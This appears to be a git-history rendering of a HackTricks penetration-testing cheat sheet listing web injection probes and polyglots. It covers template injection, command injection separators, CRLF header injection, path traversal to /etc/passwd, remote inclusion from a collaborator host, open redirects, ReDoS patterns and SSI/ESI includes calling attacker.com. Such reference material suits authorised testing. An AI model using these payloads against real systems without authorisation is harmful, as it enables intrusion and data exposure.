hacktricks/pentesting-web/pocs-and-polygloths-cheatsheet.md

106 lines
2.2 KiB
Markdown
Raw Normal View History

2021-06-25 19:22:16 +00:00
# Reflecting Techniques - PoCs and Polygloths CheatSheet
2021-06-25 16:39:43 +00:00
2021-06-25 19:22:16 +00:00
The goal of these PoCs and Polygloths is to give the tester a fast **summary** of vulnerabilities he may exploit if his **input is somehow being reflected in the response**.
## [Client Side Template Injection](client-side-template-injection-csti.md)
2021-06-25 17:01:56 +00:00
### Basic Tests
2021-06-25 16:39:43 +00:00
```text
{{7*7}}
2021-06-25 16:50:01 +00:00
[7*7]
2021-06-25 16:39:43 +00:00
```
2021-06-25 17:01:56 +00:00
### Polygloths
2021-06-25 16:50:01 +00:00
2021-06-25 17:01:56 +00:00
```bash
{{7*7}}[7*7]
```
2021-06-25 19:22:16 +00:00
## [Command Injection](command-injection.md)
2021-06-25 17:01:56 +00:00
### Basic Tests
```bash
2021-06-25 16:50:01 +00:00
ls; id
ls||id;
ls|id;
ls&&id;
ls&id;
ls%0Aid
`ls`
$(ls)
2021-06-25 17:01:56 +00:00
```
### Polygloths
2021-06-25 16:50:01 +00:00
2021-06-25 17:01:56 +00:00
```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
2021-06-25 16:50:01 +00:00
```
2021-06-25 19:22:16 +00:00
## [CRLF](crlf-0d-0a.md)
2021-06-25 17:01:56 +00:00
### Basic Tests
```bash
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
```
2021-06-25 16:50:01 +00:00
2021-06-25 19:22:16 +00:00
## [File Inclusion/Path Traversal](file-inclusion/)
### Basic Tests
```bash
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
```
## [File Upload](file-upload/)
{% page-ref page="file-upload/" %}
## [Open Redirect](open-redirect.md)
### Basic Tests
```bash
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
```
## [ReDoS](regular-expression-denial-of-service-redos.md)
### Basic Tests
```bash
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
```
## [Server Side Inclusion/Edge Side Inclusion](server-side-inclusion-edge-side-inclusion-injection.md)
### Basic Tests
```markup
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
```